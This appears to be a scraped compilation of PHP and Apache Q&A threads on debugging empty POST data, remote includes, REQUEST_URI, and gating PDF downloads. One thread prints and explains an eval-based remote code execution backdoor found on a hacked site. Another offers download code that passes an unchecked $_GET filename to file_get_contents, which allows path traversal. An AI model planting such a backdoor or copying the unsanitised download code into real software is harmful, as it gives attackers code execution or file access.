This is my my index.php file
<?php
print_r($_POST);
exit;
?>
I'm posting to my website using postman in chrome, but nothing gets there. I get back only
Array
(
)
I know that postman works because I used it when I had free webhosting. Now I asked a friend for a little space on his website, but for some reason the post data is not printed.How can I solve this ?
Here is a photo with what is happening: http://6pix.net/images/16687663370157764163.png .
Here are the Possible Mistakes and the way to debug it
1. Check if your web server supports php
You can check this by running a .php file with some output statements such as echo
2. Check if you are pointing the page properly
You shall check this by outputting some content
3. Try with full path
Some servers needs to get full path i.e., it won't support point the index.html or index.php if the directory path was given
Additional Note :
If the above issues doesn't helps then you might check with the .htaccess , blocking of REST Calls etc.,.
If you really (like shown within your screenshot) do
print_r($_REQUEST);
please check your php.ini for your
request_order
variables_order
If "post" is not within that order, $_REQUEST will not have "post" content inside.
Related
So I'm having a problem with a form I've made so one user can e-mail other users based on role fans , players or the admin.
500 "Internal Server Error":
Documentation:
http://www.cyberciti.biz/tips/http-error-500-internal-server-for-php-pages-and-solution.html (first page on google...)
You may be getting that error because of a .htacces file that is being "disturbed" by your code :) . But is generally caused by the php settings on your server. Check the integrity of the php (.ini) files on the system and search for any file that might be missing or incomplete.
EDIT:
Because you get an error when mailing.... check the part of your system php files (.ini) that are related to that.
The two files are located in the same folder?
In order to debug if the file is working you can "echo" a dummy content at the beginning of the file to test that you are going to that file (echo "worked";), then you can echo your $_POST data and check it, maybe you must check if $_POST is set : if( (isset($_POST)) AND (isset($_POST['user_name'])) ){}
I've read so many different inputs on this, so I figured I would ask on here.
Is there anything wrong or dangerous about using full links inside a php include?
Examples,
<?php include('http://www.domain.com/blah.php'); ?>
<?php
define('WEB_ROOT', './'); // relative path to /
include('layout.php');
?>
compared to using
<?php
include('../blah.php');
?>
include('http://www.domain.com/blah.php') goes out and makes an actual HTTP request to the web server, returning the contents of the URL after the web server has processed them, just as you'd see when entering that URL in your browser.
include('../blah.php') includes the local file from disk one directory higher.
The two are completely different things and you do not want to include a URL when you mean to include a local file. Even if the two are supposedly the same file, PHP cannot know that. Accessing a URL and accessing a local file path are entirely different things. It's not possible to infer that the two are the same.
<?php include('http://www.domain.com/blah.php'); ?> is very dangerous, you can't know in 100% what is the code you will get!!! becuse PHP do HTTP request and someome can do ManInTheMiddel attack and to change the code you will get, and to hack your site.
I have a file called q.php that has appeared in one of my websites. The site has been hacked. does anyone know what the file does?
<? error_reporting(0); if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(#$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
It looks like it lets anyone execute php code that is passed in as a 'q' parameter in a get request, or any code in 'eval' param of a POST request. It suppress all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.
It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advice you to clean up your server and start from a clean installation again.
It will enable the attacker to execute any code.
If you pass code to that script either by ?q=code in the URL or by including it into a POST-Request into the eval parameter it will get executed.
So basically this is a remote code execution backdoor.
Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server by passing it in the url or post data respectively.
The bigger question is how were the attackers able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers are able to execute code on your server without permission.
Merely deleting this file and any other files with rogue code in them is not fixing the problem, which is somehow attackers are able to upload files into your websites file repository.
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets the error reporting to off.
2/ if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with /?wpth on the end, the URL is echo'd at the top of the page.
3/
This will execute any code included in the value of q. i.e. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kill the page execution if a post form variable called eval is not set.
5/ eval($_POST['eval']);
Execute any code posted from a remoted hosted form where the form variable is called eval
i have some problem i try to get the uri in php.
I'm using:
$_SERVER['REQUEST_URI']
It works just fine if i do it in the index.php, but, i NEED to get the url in a include file, but, when i do it, it takes the FILE adress, i mean, it shows something like this
adress bar: www.webpage.com/index.php
$_SERVER['REQUEST_URI'] output: webpage/includefile.php
I am explaining myself here? Thanks!
How are you including the file? If it's being included via an HTTP reference then it's actually being served as a page and the functionality you are seeing is correct. If the include path is a local file, you shouldn't be seeing this behaviour
Found this whilst trying to solve the same issue.
My solution that worked is to use $_SERVER['HTTP_REFERER']
This worked well in that it also included the parameters (e.g. ?this=that&foo=bar)
Maybe somewhere in your code (or in another include file) the value is overwritten.
Hi I am trying to redirect all links to any pdf file in my site to a page with a form in it that collects user info before they can proceed to download/view the pdf.
Eg
I want to redirect *.pdf files in web site to request.php?file=name_of_pdf_being_redirected
Where request.php is the page with the form on it asking for a few details before proceeding.
All pdf's in the site are held inside /pdf folder.
Any ideas?
EDIT: sorry I'm using Apache on the server.
OK I'M GETTING THERE:
I have it working now using:
RewriteEngine on
RewriteRule ^pdf/(.+.pdf)$ request.php?file=/$1 [R]
But now when it goes to the download page when i want to let the person actually download the file my new rule is spitting the download link back to the form :-P haha so is there anyway to let it download the file once the form has been submitted and you're on download.php?
Ideas? You could start by telling us which web/app server you're using, that might help :-)
In Apache, you should be able to use a RewriteRule to morph the request into a different form. For example, turning /pub/docs/x.pdf into request.php?file=/pub/docs/x.pdf could be done with something like:
RewriteRule ^/pdf/(.*)\.pdf/ request.php?file=/$1.pdf
Keep in mind this is from memory (six years since I touched Apache and still clean :-), the format may be slightly different.
Update:
Now you've got that sorted, here's a couple of options for your next problem.
1/ Rename the PDFs to have a different extension so that they're not caught by the rewrite rule. They should be configured to push out the same MIME type to the client so that they open in the clients choice of viewer.
2/ Do the download as part of the script as well, not as a direct access to the PDF. Since the submission of the form is a HTTP request, you should be able to answer it immediately with the PDF contents rather than re-directing them again to the download page.
That second option would be my choice since it:
stops people figuring out they can get to the PDFs just by requesting xx.pdfx instead of xx.pdf.
makes it quicker for the person to get the PDF (they don't have to click on the link again).
You can try this:
Move your files to a folder "outside" your web root so that no one can access it thru a browser
Use sessions to detect whether a person has completed the form or not
Use a php powered file download script. In its naivest form, it might look like this:
if ( isset( $_SESSION[ 'OK_TO_DOWNLOAD' ] ) == false )
{
header( "Location: must_fill_this_first.php" );
exit( 0 );
}
header( "Content-type: application/pdf" );
// double check the above, google it as i am not sure
echo file_get_contents( 'some_directory_inaccessible_thru_www/' . $_GET[ 'pdf_name' ] );
// ideally a binary-safe function needs to be used above
This is a tried and tested technique I used on a website. The code example is a draft outline and needs refinement.
Note, my answer is with respect to a .NET website, but I'm sure the same constructs exist somewhere in PHP.
I would have an HTTPModule with a path of *.pdf that simply does a Response.Redirect to request.php?...etc (in my case request.aspx) And then in the event handler for the button click on that page, when you know which pdf to display and that they're authorized, simple do a Response.ContentType = [MIME type of pdf], and then Response.WriteFile(pdfFile), and finally Response.End().
There are other things you can add to make it better, such as filesize, etc. But in the minimal case, this would work. If you want the code for it in C# I could come up with something in about 3 minutes, but in PHP i'm quite lost. I'd start out looking for HTTPModules and how to write them in PHP.
Googling for "PHP HTTPModule" leads to this: Equivalent of ASP.NET HttpModules in PHP so, I may be a little wrong, but hopefully that's a starting point.
Use an .htaccess file if you're using an Apache web server. You'll need to make certain that you have mod_rewrite enabled, but once you do you can rewrite all files using these two simple lines:
RewriteEngine On
RewriteRule ^.pdf$ /rewrite.php [NC,L]
If you are using IIS, you can accomplish something similar using ISAPI_Rewrite.
Your other alternative is to place your pdf's inside of a directory that is not publicly accessible and then any request made for a pdf resource would return an access denied error and the files could only be accessed through the appropriate download script.
if($user==authenticated){
//set pdf headers
echo file_get_contents('actual.pdf');
no mod re-writes, hides actual source and is what i normally do - hope this helps